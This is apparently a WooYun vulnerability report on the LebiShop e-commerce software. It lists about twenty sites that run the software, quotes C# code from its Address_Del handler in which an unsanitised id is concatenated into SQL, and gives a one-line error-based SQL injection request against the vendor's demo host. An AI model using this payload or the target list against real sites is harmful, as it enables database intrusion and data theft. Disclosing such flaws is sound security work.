WooYun.org

http://168dev.com/lebishop/Category.aspx
http://oa.psy123.com.cn/AllCategories.aspx
http://www.huacaiye.com/Category.aspx?tid=1
http://daiba.com.cn/Category.aspx?id=9
http://hkapp.cn/EN/Category.aspx?id=10
http://54mbb.com/EN/NewsDetails.aspx?id=5
http://shop.lutoog.com/Brand.aspx?id=189
http://queengift.net/EN/Brand.aspx?id=190
http://www.snsrn.com/en/
http://www.skycastle100.com/Search.aspx?keyword=lianyiquan
http://71pg.com/Category.aspx?tid=35
http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2
http://lovedou.com/en/
http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1
http://newautoch.com/NewsDetails.aspx?id=5
http://memy.cc/
http://www.thanks789.com/Brand.aspx?id=191
http://m.gzyytz.cn/
http://www.thanks789.com/Brand.aspx?id=191

http://demo.lebi.cn/ajax/Ajax_order.aspx

public void Address_Del()
{
    string str = RequestTool.RequestString("id"); //只是处理了单引号 这里不需要单引号
    if (str == "")
    {
        base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}");
    }
    else
    {
        B_Lebi_User_Address.Delete(string.Concat(new object[] { "User_id = ", base.CurrentUser.id, " and id in(", str, ")" }));//存在注入
        if (B_Lebi_User_Address.GetModel(string.Concat(new object[] { "User_id = ", base.CurrentUser.id, " and id = ", base.CurrentUser.User_Address_id })) == null)
        {
            if (B_Lebi_User_Address.GetModel("User_id = " + base.CurrentUser.id) != null)
            {
                base.CurrentUser.User_Address_id = B_Lebi_User_Address.GetMaxId("User_id=" + base.CurrentUser.id);
            }
            B_Lebi_User.Update(base.CurrentUser);
        }
        base.Response.Write("{\"msg\":\"OK\"}");
    }
}

http://demo.lebi.cn/ajax/Ajax_order.aspx

__Action=Address_Del&id=-1) and convert(int,@@version)>0--